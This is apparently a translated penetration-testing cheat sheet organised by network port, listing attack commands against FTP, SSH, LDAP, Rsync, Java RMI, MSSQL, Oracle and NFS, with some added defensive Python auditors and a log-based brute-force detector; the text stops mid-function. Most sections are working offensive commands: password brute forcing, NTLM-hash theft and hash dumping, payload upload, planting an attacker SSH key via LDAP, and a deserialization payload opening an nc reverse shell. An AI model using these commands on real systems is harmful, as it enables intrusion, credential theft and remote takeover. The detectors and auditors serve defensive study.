Service Penetration Testing Notes

This article records approaches and methods for penetration-testing various network services.

The content here is intended only for study and exchange among network-security practitioners; do not use it for illegal purposes…

Port / service penetration table

Port | Service | Vulnerabilities / approach
21 | FTP / vsftpd (file transfer) | brute force / sniffing / file upload / backdoor
22 | SSH remote login | brute force / proxy forwarding
23 | Telnet remote login | brute force / sniffing
25 | SMTP mail service | mail spoofing
53 | DNS | zone transfer / hijacking / tunnelling
67/68 | DHCP | hijacking / spoofing
69 | TFTP (Trivial File Transfer Protocol) | try to download important configuration files from the target
110 | POP3 | brute force / sniffing
137/139/445 | SMB (NetBIOS) | brute force / unauthorized access / remote code execution
143 | IMAP | brute force
161 | SNMP (Simple Network Management Protocol) | brute force / gathering internal network information
389 | LDAP (Lightweight Directory Access Protocol) | injection / unauthorized access / weak passwords / anonymous access
512/513/514 | Linux Rexec | brute force / rlogin login
873 | Rsync | file upload / anonymous access
1080 | SOCKS proxy | brute force / internal network pivoting
1098/1099 | Java RMI | deserialization remote command execution
1194 | OpenVPN | obtain VPN credentials to enter the internal network
1352 | Lotus Domino mail | brute force / weak passwords / information disclosure
1433 | MSSQL | brute force / injection / privilege escalation / weak sa password
1500 | ISPmanager hosting control panel | weak passwords
1521-1529 | Oracle | injection / TNS brute force / reverse shell
1723 | PPTP (Point-to-Point Tunneling Protocol) | brute force / obtain VPN credentials to enter the internal network
2049 | NFS | misconfiguration
2082,2083 | cPanel hosting control panel | weak passwords
2181 | ZooKeeper | unauthorized access
2375-2376 | Docker Remote API | unauthorized access
2601,2604 | Zebra routing daemon | default password "zebra"
3128 | Squid proxy | weak passwords
3306 | MySQL | brute force / injection / denial of service / privilege escalation
3389 | RDP (Remote Desktop) | brute force / Shift (sticky keys) backdoor / MS12-020
3690 | SVN | repository leak / unauthorized access
4848 | GlassFish console | brute force / authentication bypass
5000 | Docker Registry | unauthorized access
5432 | PostgreSQL | brute force / injection / buffer overflow
5306 | Kibana | unauthorized access
5900,5901,5902 | VNC | weak-password brute force
5984 | CouchDB | unauthorized access leading to arbitrary command execution
6379 | Redis | unauthorized access / remote command execution
6443 | Kubernetes API Server | unauthorized access
7001/7002 | WebLogic | Java deserialization / weak console password / webshell upload via console / SSRF
80-89,443 | HTTP/HTTPS | web application vulnerabilities / OpenSSL Heartbleed
8000 | JDWP | remote command execution
8009 | AJP | remote code execution
8069 | Zabbix | remote command execution / injection
8080-8089 | JBoss / Tomcat / Jenkins / Resin / Jetty | weak console passwords / deserialization / RCE
8083/8086 | InfluxDB | unauthorized access
8161 | ActiveMQ | weak passwords / arbitrary file write / deserialization
9000 | FastCGI | remote command execution
9080-9081,9090 | WebSphere console | Java deserialization / weak passwords
9200/9300 | Elasticsearch | unauthorized access / remote code execution
11211 | Memcached | unauthorized access
15672 | RabbitMQ | weak passwords
27017/27018 | MongoDB | unauthorized access / brute force
50000 | SAP | remote code execution
50030,50060,50070,50075,50090 | Hadoop | unauthorized access on default ports

21-FTP

nc -vn <IP> 21

telnet <IP> 21

Anonymous login

ftp <IP>
>anonymous
>anonymous
>ls -a # List all files, including hidden ones
>binary # Set the transfer mode to binary instead of ascii
>ascii # Set the transfer mode to ascii instead of binary
>bye # Exit

File download

wget -m ftp://anonymous:anonymous@<IP>              # Download everything
wget -m --no-passive ftp://anonymous:anonymous@<IP> # Download everything using active mode

Browser connection

ftp://anonymous:anonymous@<IP>

Attack approaches

1) nmap ftp scripts
nmap --script ftp-* -p 21 {IP}

2) Hydra brute force
hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp

3) Console-less msf enumeration of ftp
msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'

Brute force

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp

refer:

22-SSH/SFTP

Banner grabbing

nc -vn <IP> 22

Authentication methods

ssh -v <IP> -p <PORT>

Public key collection

ssh-keyscan -t rsa <IP> -p <PORT>

Nmap enumeration

nmap -p22 <ip> -sC   # run the default scripts
nmap -p22 <ip> -sV   # retrieve the version
nmap -p22 <ip> --script ssh2-enum-algos # retrieve the supported algorithms
nmap -p22 <ip> --script ssh-hostkey --script-args ssh_hostkey=full # retrieve the host keys (check for weak keys)
nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # check the authentication methods

Metasploit enumeration

msfconsole -q -x 'use auxiliary/scanner/ssh/ssh_version; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use scanner/ssh/ssh_enumusers; set RHOSTS {IP}; set RPORT 22; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ssh/juniper_backdoor; set RHOSTS {IP}; set RPORT 22; run; exit'

Brute force

msf> use scanner/ssh/ssh_enumusers
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'

refer:

23-Telnet

Banner grabbing

nc -vn <IP> 23

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

Attack

nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Brute force

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

refer:
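The password-guessing tools listed for FTP, SSH and Telnet above (hydra, ncrack, medusa, patator) all leave the same footprint on the target: a burst of failed logins from one source address within seconds. The following detector is an added example, not code from the original article. It parses constructed OpenSSH auth.log lines (the sample lines, the threshold and the window are assumptions) and reports every source address that exceeds the threshold inside a sliding time window; the same logic applies to vsftpd or telnetd logs with a different line pattern.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines in the syslog format written by OpenSSH (not a real log).
# Syslog timestamps carry no year, so a reference year is assumed when parsing.
SAMPLE_LOG = """\
Mar  4 10:00:01 bastion sshd[2201]: Failed password for root from 10.0.0.5 port 51234 ssh2
Mar  4 10:00:02 bastion sshd[2203]: Failed password for invalid user admin from 10.0.0.5 port 51236 ssh2
Mar  4 10:00:02 bastion sshd[2205]: Failed password for root from 10.0.0.5 port 51238 ssh2
Mar  4 10:00:03 bastion sshd[2207]: Failed password for invalid user test from 10.0.0.5 port 51240 ssh2
Mar  4 10:00:04 bastion sshd[2209]: Failed password for root from 10.0.0.5 port 51242 ssh2
Mar  4 10:00:05 bastion sshd[2211]: Accepted publickey for deploy from 10.0.0.9 port 40000 ssh2: ED25519 SHA256:AAAA
Mar  4 10:00:09 bastion sshd[2213]: Failed password for root from 10.0.0.5 port 51244 ssh2
Mar  4 10:07:00 bastion sshd[2250]: Failed password for alice from 10.0.0.7 port 52000 ssh2
Mar  4 10:20:00 bastion sshd[2300]: Failed password for alice from 10.0.0.7 port 52002 ssh2
"""

# "invalid user" is present when the account does not exist; the group still captures the name.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_failures(text, year=2024):
    """Yield (timestamp, user, source_ip) for every failed-password line."""
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["user"], m["ip"]


def detect_bruteforce(text, threshold=5, window_seconds=60):
    """Return {source_ip: (peak_failures_in_window, sorted_users_tried)} for every
    source whose failures reach `threshold` within any `window_seconds` window."""
    recent = defaultdict(deque)   # per source: timestamps still inside the window
    users = defaultdict(set)      # per source: account names tried
    alerts = {}
    for ts, user, ip in sorted(parse_failures(text)):
        q = recent[ip]
        q.append(ts)
        users[ip].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:   # slide the window
            q.popleft()
        if len(q) >= threshold:
            peak = max(len(q), alerts.get(ip, (0, []))[0])
            alerts[ip] = (peak, sorted(users[ip]))
    return alerts


if __name__ == "__main__":
    for ip, (count, tried) in detect_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {count} failures within 60s, accounts tried: {', '.join(tried)}")
```

A single source cycling through several account names in seconds (root, admin, test above) is the signature of a wordlist run; two failures from 10.0.0.7 thirteen minutes apart stay below the threshold and are not reported.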

53-DNS

Banner grabbing

dig version.bind CHAOS TXT @<DNS_IP>

nmap -n -sV -Pn --script dns-nsid -p 53 {IP}

Zone transfer

dig axfr @<DNS_IP>           # try a zone transfer without naming a domain
dig axfr @<DNS_IP> <DOMAIN>  # zone transfer for a guessed domain
fierce --domain <DOMAIN> --dns-servers <DNS_IP> # try a zone transfer against every authoritative server; fall back to a wordlist attack if that fails

Dig queries

dig ANY @<DNS_IP> <DOMAIN>     #Any information
dig A @<DNS_IP> <DOMAIN>       #Regular DNS request
dig AAAA @<DNS_IP> <DOMAIN>    #IPv6 DNS request
dig TXT @<DNS_IP> <DOMAIN>     #Information
dig MX @<DNS_IP> <DOMAIN>      #Mail-related records
dig NS @<DNS_IP> <DOMAIN>      #Name servers that resolve that name
dig -x 192.168.0.2 @<DNS_IP>   #Reverse lookup
dig -x 2a00:1450:400c:c06::93 @<DNS_IP> #Reverse IPv6 lookup

#Use [-p PORT] or -6 (to use the IPv6 address of the DNS server)

Reverse DNS brute force

dnsrecon -r 127.0.0.0/24 -n <IP_DNS>  #Reverse DNS of all the addresses
dnsrecon -r 127.0.1.0/24 -n <IP_DNS>  #Reverse DNS of all the addresses
dnsrecon -r <IP_DNS>/24 -n <IP_DNS>   #Reverse DNS of all the addresses
dnsrecon -d active.htb -a -n <IP_DNS> #Zone transfer

Subdomain brute force

dnsrecon -D subdomains-1000.txt -d <DOMAIN> -n <IP_DNS>
dnscan -d <domain> -r -w subdomains-1000.txt #Brute-force subdomains recursively, https://github.com/rbsec/dnscan

Attack

nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" {IP}

msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'

refer:
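The zone-transfer commands above only succeed when the authoritative server's allow-transfer policy admits the client. The following is an added defender-side example, not code from the original article: it audits a BIND named.conf (a constructed sample) and reports which zones would answer an AXFR from an arbitrary client. The brace-matching parser, the verdict strings, and the treatment of a zone with no allow-transfer anywhere as open (BIND's documented default permits transfers to all hosts) are assumptions of this example.

```python
import re

# Constructed named.conf fragment (not from the article): one restricted zone,
# one zone open to any host, one zone inheriting the options-level setting.
SAMPLE_NAMED_CONF = """
options {
    directory "/var/cache/bind";
    allow-transfer { none; };
};

zone "corp.example" {
    type primary;
    file "/etc/bind/db.corp.example";
    allow-transfer { 192.0.2.53; 2001:db8::53; };
};

zone "legacy.example" {
    type master;
    file "/etc/bind/db.legacy.example";
    allow-transfer { any; };
};

zone "inherit.example" {
    type primary;
    file "/etc/bind/db.inherit.example";
};
"""


def _blocks(text, keyword):
    """Yield (label, body) for every `keyword ["label"] { body };` statement,
    walking the braces so nested blocks inside the body are kept intact."""
    for m in re.finditer(r'\b' + keyword + r'\b\s*(?:"([^"]*)"\s*)?\{', text):
        depth, i = 1, m.end()
        while depth and i < len(text):
            depth += {'{': 1, '}': -1}.get(text[i], 0)
            i += 1
        yield m.group(1), text[m.end():i - 1]


def _allow_transfer(body):
    """Return the allow-transfer address list of a block, or None if unset."""
    m = re.search(r'allow-transfer\s*\{([^}]*)\}', body)
    if not m:
        return None
    return [t.strip() for t in m.group(1).split(';') if t.strip()]


def audit_zone_transfers(conf):
    """Return {zone_name: verdict}. A zone-level allow-transfer overrides the
    options-level one; with neither present the zone is reported as open."""
    global_acl = None
    for _, body in _blocks(conf, 'options'):
        global_acl = _allow_transfer(body)
    verdicts = {}
    for name, body in _blocks(conf, 'zone'):
        acl = _allow_transfer(body)
        effective = acl if acl is not None else global_acl
        if effective is None:
            verdicts[name] = 'open (no allow-transfer set; BIND default permits any host)'
        elif 'any' in effective:
            verdicts[name] = 'open (allow-transfer any)'
        elif effective == ['none']:
            verdicts[name] = 'closed'
        else:
            verdicts[name] = 'restricted to ' + ', '.join(effective)
    return verdicts


if __name__ == "__main__":
    for zone, verdict in audit_zone_transfers(SAMPLE_NAMED_CONF).items():
        print(f"{zone}: {verdict}")
```

The two conditions that matter operationally are `any` at zone level and the absence of any restriction at both levels; a zone inheriting `none` from options is safe even though its own block says nothing.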

69-TFTP

Service enumeration

nmap -n -Pn -sU -p69 -sV --script tftp-enum <IP>

Download / upload

msf5> use auxiliary/admin/tftp/tftp_transfer_util

---

import tftpy
client = tftpy.TftpClient("<IP>", 69)                            # target host and UDP port (69 by default)
client.download("remote_filename", "/tmp/filename", timeout=5)   # name on the server, local destination
client.upload("remote_filename", "/local/path/file", timeout=5)  # name on the server, local source file

389/636-LDAP

Service fingerprint

389 (ldap) and 636 (ldaps)

PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped

Service enumeration

nmap -n -sV --script "ldap* and not brute" <IP>   #Using anonymous credentials

nmap -p 389 --script ldap-search -Pn {IP}

Writing data

>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port=636, use_ssl=True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa <SSH_PUBLIC_KEY> badguy@evil'])]})

Information dump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute force

nmap --script ldap-brute -p 389 <IP>

hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f

Credential checks and data extraction

1) Check for null credentials, or whether a set of credentials is valid

ldapsearch -x -h <IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

2) Information extraction

ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple authentication
-h LDAP server
-D My user
-w My password
-b Base DN; everything below it will be returned

Extract users
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -h <IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Extract computers
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract my own info
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract Domain Admins
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract Domain Users
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract Enterprise Admins
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract Administrators
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Extract the Remote Desktop Users group
ldapsearch -x -h <IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

refer:

512-514: Rexec/Rlogin/Rsh

Fingerprint

1) Rexec: allows executing commands on the host

PORT STATE SERVICE
512/tcp open exec

2) Rlogin/Rsh: legacy remote login

PORT STATE SERVICE
513/tcp open login

Common commands

rlogin <IP> -l <username>

rsh <IP> <Command>
rsh <IP> -l domain\user <Command>
rsh domain/user@<IP> <Command>
rsh domain\\user@<IP> <Command>

Brute force

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

hydra -L <Username_list> rsh://<Victim_IP> -v -V

873-Rsync

Banner grabbing

nc -vn <IP> 873

Service enumeration

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>
msf> use auxiliary/scanner/rsync/modules_list

Brute force

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

Exploitation

1) List shared modules

rsync -av --list-only rsync://192.168.0.123/shared_name

2) Download files

rsync -av --list-only rsync://<username>@<IP>/shared_name
rsync -av rsync://<username>@<IP>:8730/shared_name ./rsyn_shared

3) Upload files

rsync -av home_user/.ssh/ rsync://<username>@<IP>/home_user/.ssh

4) Find the configuration files

find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
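Steps 1 to 3 above work only against modules that are listable, writable and unauthenticated, which is exactly what rsyncd.conf decides. The following audit is an added example, not code from the original article: it parses a constructed rsyncd.conf and reports, per module, the settings that permit anonymous listing or upload. The sample file and the finding strings are assumptions; rsync's documented defaults (read only = yes, no auth users, all hosts allowed) are taken as the baseline for missing keys.

```python
import configparser

# Constructed rsyncd.conf (not from the article): "backup" is anonymous and
# writable, "www" is locked down, "home_user" is authenticated but runs as root.
SAMPLE_RSYNCD_CONF = """
uid = nobody
gid = nogroup
use chroot = yes

[backup]
    path = /srv/backup
    read only = no
    list = yes

[www]
    path = /srv/www
    read only = yes
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    hosts allow = 192.0.2.0/24

[home_user]
    path = /home/user
    uid = root
    read only = no
    auth users = user
    secrets file = /etc/rsyncd.secrets
"""


def parse_rsyncd(text):
    """Return (global_settings, {module: effective_settings}).
    rsyncd.conf is INI-like, so configparser does the parsing; indentation is
    stripped first because configparser treats indented lines as continuations."""
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string("[__global__]\n" + flat)   # hoist top-level keys into a pseudo-section
    glob = dict(cp["__global__"])
    modules = {s: {**glob, **dict(cp[s])} for s in cp.sections() if s != "__global__"}
    return glob, modules


def audit_rsyncd(text):
    """Return {module: [findings]} for modules exposing anonymous or writable access."""
    _, modules = parse_rsyncd(text)
    findings = {}
    for name, cfg in modules.items():
        issues = []
        writable = cfg.get("read only", "yes").lower() in ("no", "false", "0")
        anonymous = "auth users" not in cfg
        if anonymous:
            issues.append("no 'auth users': module is reachable without credentials")
        if writable:
            issues.append("'read only = no': clients can upload files")
        if anonymous and writable:
            issues.append("anonymous write access: arbitrary file upload into " + cfg.get("path", "?"))
        if "hosts allow" not in cfg:
            issues.append("no 'hosts allow': any source address may connect")
        if cfg.get("uid", "").lower() == "root":
            issues.append("'uid = root': transfers run as root, so uploads can overwrite any file under path")
        if issues:
            findings[name] = issues
    return findings


if __name__ == "__main__":
    for module, issues in audit_rsyncd(SAMPLE_RSYNCD_CONF).items():
        print(f"[{module}]")
        for issue in issues:
            print("  -", issue)
```

The module that matters most is the one combining no auth users with read only = no: that is the configuration the upload step above relies on, and a hosts allow line alone does not close it.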

1080-Socks

Authentication check

nmap -p 1080 <ip> --script socks-auth-info

Brute force

nmap --script socks-brute -p 1080 <ip>

nmap --script socks-brute --script-args userdb=users.txt,passdb=rockyou.txt,unpwdb.timelimit=30m -p 1080 <ip>

Port forwarding

vim /etc/proxychains4.conf
socks5 10.10.10.10 1080

socks5 10.10.10.10 1080 username password # with authentication

refer: https://book.hacktricks.xyz/tunneling-and-port-forwarding

1098-1099: Java RMI

Service fingerprint

Default ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999

PORT STATE SERVICE VERSION
1090/tcp open ssl/java-rmi Java RMI
9010/tcp open java-rmi Java RMI
37471/tcp open java-rmi Java RMI
40259/tcp open ssl/java-rmi Java RMI

Exploitation

1) Service enumeration

rmg enum {IP} {PORT}

2) Brute force

rmg guess {IP} {PORT}

3) Deserialization attack

rmg serial 172.17.0.2 9010 CommonsCollections6 'nc 172.17.0.1 4444 -e ash' --bound-name plain-server --signature "String execute(String dummy)"

nc -vlp 4444

refer:

1433-MSSQL

Information gathering

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
msf> use auxiliary/scanner/mssql/mssql_ping

searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql

Metasploit

#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if a domain is used

#Steal NTLM
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal the NTLM hash; run Responder before executing

#Info gathering
msf> use admin/mssql/mssql_enum #Security checks
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Search for interesting data
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf

#Privesc
msf> use exploit/windows/mssql/mssql_linkcrawler
msf> use admin/mssql/mssql_escalate_execute_as #If the user has the IMPERSONATE privilege, this will try to escalate
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin

#Code execution
msf> use admin/mssql/mssql_exec #Execute commands
msf> use exploit/windows/mssql/mssql_payload #Upload and execute a payload

#Add a new admin user from a meterpreter session
msf> use windows/manage/mssql_local_auth_bypass

Brute force

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could lock accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can lock accounts. If you have a domain, set it and use USE_WINDOWS_AUTHENT

refer:

1521-1529: Oracle TNS

Service fingerprint

1521/tcp open  oracle-tns    Oracle TNS Listener

Version enumeration

nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
msf> use auxiliary/scanner/oracle/tnslsnr_version

#apt install tnscmd10g
tnscmd10g version -p 1521 -h <IP>

hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener

SID enumeration

tnscmd10g status -p 1521 -h <IP> #The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

#msf1
msf> use auxiliary/scanner/oracle/sid_enum
msf> set rhost <IP>
msf> run
#msf2
msf> use auxiliary/admin/oracle/tnscmd
msf> set CMD (CONNECT_DATA=(COMMAND=STATUS))
msf> set rhost <IP>
msf> run #The SIDs are inside: SERVICE=(SERVICE_NAME=<SID_NAME>)

SID brute force

hydra -L /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 <IP> oracle-sid
patator oracle_login host=<IP> sid=FILE0 0=sids-oracle.txt -x ignore:code=ORA-12505
./odat.py sidguesser -s $SERVER -d $SID --sids-file=./sids.txt
msf> use auxiliary/admin/oracle/sid_brute #This will use the list located at /usr/share/metasploit-framework/data/wordlists/sid.txt
nmap --script +oracle-sid-brute -p 1521 10.11.1.202 #This will use the list located at /usr/share/nmap/nselib/data/oracle-sids

Brute force

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#nmap fails sometimes for some reason executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

Login

sqlplus <username>/<password>@<ip_address>/<SID>;

sqlplus <username>/<password>@<ip_address>:<port>/<SID>; # non-standard port

sqlplus <username>/<password>@<ip_address>/<SID> 'as sysdba'; # privileged account
#Example: sqlplus SYSTEM/<password>@<IP>/ORCL 'as sysdba'

Automated scanning

1) oscanner
#apt install oscanner
oscanner -s <IP> -P <PORT>

2) odat
git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py --help
./odat.py all -s <IP> -p <PORT>
./odat.py all -s <IP> -p <PORT> -d <SID> #To brute-force accounts for that SID

Code execution

Install ODAT

git clone https://github.com/quentinhardy/odat.git
cd odat
./odat.py #There shouldn't be any problems on Kali

1) Execute code through a Java stored procedure
./odat.py java -s <IP> -U <username> -P <password> -d <SID> --exec COMMAND

2) Execute code through the scheduler
./odat.py dbmsscheduler -s <IP> -d <SID> -U <username> -P <password> --exec "C:\windows\system32\cmd.exe /c echo 123>>C:\hacK"

3) Execute code through an external table
./odat.py externaltable -s <IP> -U <username> -P <password> -d <SID> --exec "C:/windows/system32" "calc.exe"

refer:

2049-NFS

Fingerprint / configuration

2049/tcp open  nfs     2-3 (RPC #100003)

/etc/exports
/etc/lib/nfs/etab

Service enumeration

nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-statfs.nse -p 2049 {IP}

MSF: scanner/nfs/nfsmount #Scan NFS mounts and list permissions

Mounting

showmount -e <IP>   # list the exported folders

Method 1:
mount -t nfs [-o vers=2] <ip>:<remote_folder> <local_folder> -o nolock

Method 2:
mkdir /mnt/new_back
mount -t nfs [-o vers=2] 10.12.0.150:/backup /mnt/new_back -o nolock
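What a mounted export gives a client is decided by the /etc/exports line that publishes it, which is the file listed under fingerprint / configuration above and the reason the port table marks 2049 as "misconfiguration". The following is an added example, not code from the original article: it parses a constructed /etc/exports and flags the client/option combinations that let an arbitrary client mount, write, or keep root identity. The sample file and the finding strings are assumptions; the option names are NFS's own.

```python
import re

# Constructed /etc/exports (not from the article). /backup is fine, /srv/public is
# read-only to the world, /home is the dangerous line, /data has one bad client spec.
SAMPLE_EXPORTS = """
# backups for the build farm
/backup     10.12.0.0/24(rw,sync,no_subtree_check)
/srv/public *(ro,all_squash,no_subtree_check)
/home       *(rw,no_root_squash,insecure,async)
/data       build01(rw,sync) build02(rw,sync,no_root_squash)
"""

EXPORT_RE = re.compile(r'^(\S+)\s+(.*)$')
# Either "client(opt,opt)" or a bare client name with default options.
CLIENT_RE = re.compile(r'(\S+?)\((.*?)\)|(\S+)')


def parse_exports(text):
    """Yield (path, client, set_of_options) for every client spec in the file."""
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, rest = EXPORT_RE.match(line).groups()
        for host, opts, bare in CLIENT_RE.findall(rest):
            client = host or bare
            options = {o.strip() for o in opts.split(',') if o.strip()}
            yield path, client, options


def audit_exports(text):
    """Return {path: [findings]} for exports an arbitrary client could abuse."""
    findings = {}
    for path, client, opts in parse_exports(text):
        issues = []
        world = client in ('*', '0.0.0.0/0') or client.startswith('*.')
        if world and 'rw' in opts:
            issues.append(f"{client}: world-writable export")
        elif world:
            issues.append(f"{client}: world-readable export")
        if 'no_root_squash' in opts:
            issues.append(f"{client}: no_root_squash keeps a remote root as uid 0 on this export")
        if 'insecure' in opts:
            issues.append(f"{client}: insecure accepts mounts from unprivileged source ports")
        if world and 'rw' in opts and not any(o.startswith('sec=') for o in opts):
            issues.append(f"{client}: AUTH_SYS only, client-asserted UIDs are trusted")
        if issues:
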